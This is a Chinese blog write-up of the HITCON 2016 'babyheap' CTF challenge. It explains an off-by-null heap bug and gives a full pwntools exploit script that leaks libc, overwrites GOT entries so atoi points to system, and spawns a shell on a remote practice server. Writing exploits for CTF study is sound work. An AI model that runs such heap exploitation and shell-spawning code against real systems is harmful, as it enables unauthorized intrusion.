babyheap_hitcon_2016

最新推荐文章于 2024-07-25 17:11:44 发布
最新推荐文章于 2024-07-25 17:11:44 发布
阅读量383 收藏 1
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107567450
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

babyheap_hitcon_2016

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,输入函数存在off by null漏洞

通过这个off by null,可以将content指针低1字节覆盖为0,也就是相当于content指向的地方在上方去了。

因此,我们只需要在上方的位置,伪造一个合适的chunk,然后free掉,这样,unsorted bin和fastbin就有重合了。

程序中,仅仅关闭了stdout的缓冲区,没有关闭stdin的缓冲液

因此,通过功能4,我们可以初始化stdin的缓冲区,我们可以首先就初始化它的缓冲区,然后在创建节点,这样content指针低1字节覆盖后,正好可以指向stdin缓冲区的内部,我们就可以利用scanf将伪造的chunk’数据输进去。

构造了overlap chunk以后,就可以通过伪造节点的content指针,达到任意地址读写,为了多次利用edit,利用第一次edit将exit的got表修改为其他函数,只要保证不崩溃,不退出即可。

然后就可以利同样的方法,泄露地址,写got表来getshell

#coding:utf8
from pwn import *

#context.log_level = 'debug'
#sh = process('./babyheap_hitcon_2016')
sh = remote('node3.buuoj.cn',26537)
elf = ELF('./babyheap_hitcon_2016')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
printf_plt = elf.plt['printf']
read_plt = elf.plt['read']
exit_got = elf.got['_exit']

def add(size,content,name):
   sh.sendlineafter('Your choice:','1')
   sh.sendlineafter('Size :',str(size))
   sh.sendafter('Content:',content)
   sh.sendafter('Name:',name)

def delete():
   sh.sendlineafter('Your choice:','2')

def edit(content):
   sh.sendlineafter('Your choice:','3')
   sh.sendafter('Content:',content)

def Exit(c):
   sh.sendlineafter('Your choice:','4')
   sh.sendafter('Really?',c)

Exit('n\n')

#null off by one
add(0x100,p64(0) + p64(0x101) + 'a'*0xF0,'b'*0x8)
#通过stdout的缓冲区,将伪造的chunk布置到上方
Exit('n '.ljust(0xFE0,'a') + p64(0) + p64(0x51) + '\n')
#形成overlap chunk
delete()
#控制节点结构体的数据
add(0x40,'a'*0x20 + p64(0x200) + 'b'*0x8 + p64(exit_got),'b'*0x7)

#修改exit的got表为任意不崩溃函数,atoi的got表修改为printf_plt
payload = p64(read_plt) #exit
payload += p64(0x400756) #read_chk
payload += p64(0x400766) #puts
payload += p64(0x400776) #_stack_chk_fail
payload += p64(0x400786) #printf
payload += p64(0x400796) #alarm
payload += p64(0x4007A6) #read
payload += p64(0x4007B6) #_libc_start_main
payload += p64(0x4007C6) #_signal
payload += p64(0x4007D6) #_malloc
payload += p64(0x4007E6) #_setvbuf
payload += p64(printf_plt) #_atoi
edit(payload)
sh.sendlineafter('Your choice:','%7$p')
sh.recvuntil('0x')
libc_base = int(sh.recvuntil('\n',drop = True),16) - 0x16A - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#控制rax为3,这样我们就可以进入选项3,继续编辑了
sh.sendlineafter('Your choice:','a'*0x2)

#修改atoi的got表为system_addr
payload = p64(read_plt) #exit
payload += p64(0x400756) #read_chk
payload += p64(0x400766) #puts
payload += p64(0x400776) #_stack_chk_fail
payload += p64(0x400786) #printf
payload += p64(0x400796) #alarm
payload += p64(0x4007A6) #read
payload += p64(0x4007B6) #_libc_start_main
payload += p64(0x4007C6) #_signal
payload += p64(0x4007D6) #_malloc
payload += p64(0x4007E6) #_setvbuf
payload += p64(system_addr) #_atoi
sh.sendlineafter('Content:',payload)
#getshell
sh.sendlineafter('Your choice:','/bin/sh')

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
hitcon 2016 pwn babyheap writeup
jmp esp
05-22 999
NoticeFor English information, just get a closer look at my exp.py.题目Heap so fun! Baby, don’t do it first. nc 52.68.77.85 8731 note : the service is running on ubuntu 16.04地址:https://github.com/ctfs/w
HITCON-trainning&寒假做题记录
Peanuts
01-28 660
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
[原题复现]-HITCON 2016 WEB《babytrick》[反序列化]
笑花大王
01-31 556
前言 不想复现的可以访问榆林学院信息安全协会CTF训练平台找到此题直接练手 HITCON 2016 WEB -babytrick(复现) 原题 index.php 1 <?php 2 3 include "config.php"; 4 5 class HITCON{ 6 private $method; 7 private $...
Hitcon 2016 Pwn赛题学习
weixin_30553777的博客
04-26 257
PS:这是我很久以前写的,大概是去年刚结束Hitcon2016时写的。写完之后就丢在硬盘里没管了,最近翻出来才想起来写过这个,索性发出来 0x0 前言 Hitcon个人感觉是高质量的比赛,相比国内的CTF,Hitcon的题目内容更新,往往会出现一些以前从未从题目中出现过的姿势。同时观察一些CTF也可以发现,往往都是国外以及台湾的CTF中首先出现的姿势,然后一段时间后才会被国内的CTF学习到。 此次...
buuctf (0ctf_2017_babyheap) (hitcon2014_stkof)
cainiao78777的博客
05-25 115
伪造fake_chunk然后向前和并,出发unlink,修改第一个堆块指针,为free的got表,第二块的指针改为puts的got表,然后再把free的got表改为puts的plt表,然后free堆块2,泄露出libc_base,然后计算出system函数的地址,再把free的got表改为system函数,然后释放字符串为/bin/sh的堆块,getshell。输入一个申请的大小。正常申请堆块,输入大小,然后按大小申请一个,返回堆块的序号。这个输出并不会打印堆块的内容,是个假的输出。查看程序逻辑以及保护。
IO_file attack(_IO_str_finish)以及 free_hook用法
carol2358的博客
08-04 1062
题目是0ctf_2017_babyheap 漏洞是堆溢出 free_hook 参考链接: https://xz.aliyun.com/t/7020 https://bbs.pediy.com/thread-230028.htm https://bbs.pediy.com/thread-246786.htm free_hook在libc2.23中用起来比较费劲,2.27中用的比较多 free_hook可以在og用不了的时候来system(binsh),但我为什么不realloc_hook呢? 因为f
持续更新 BUUCTF——PWN(三)
weixin_41748164的博客
03-04 867
这只是个人笔记,buuctf的刷题的第三篇,欢迎一起讨论重新搭建一个合适pwn环境:https://blog.csdn.net/weixin_41748164/article/details/127874334buuctf的前两页:https://blog.csdn.net/weixin_41748164/article/details/126325515。
BUUCTF pwn 五月刷题
coco的博客
05-04 681
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
heap_exploit_2.31
03-21
2019 TCTF最终版Babyheap2.29 2019 Balsn纯文字 大垃圾箱攻击 tcache dup tcache double free fastbin双免费 botcake的房子 其他堆利用技术与how2heap相同,因此我不编写其他代码-.- pwngdb pwngdb是用于堆...
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 471
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1123
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 421
2024安全大模型技术与市场研究报告
轨道式智能巡检机器人,助力综合管廊安全运维
配电房综合监控
07-25 813
管廊巡检往往处于昏暗、潮湿、幽闭且狭长的空间环境,巡检过程中容易遇到有毒有害气体、泄露的燃气和强电等危险,同时不可避免会对巡检人员的心理构成一定负面影响。)实时性:地下管廊短则几公里、长则数十公里,其内部空间结构复杂,具有设备多、定位难的特点。综合管廊内部环境复杂而恶劣,给水、排水、热力、燃气、电力、电信等管道排布其中,空间狭窄、昏暗、潮湿,甚至会出现有毒害气体泄漏的环境。)环境检测功能:基于各类环境传感器,对于廊体内温湿度、有害气体含量、空气含氧量、烟雾浓度、光照度、井盖等状态进行检测。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 661
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值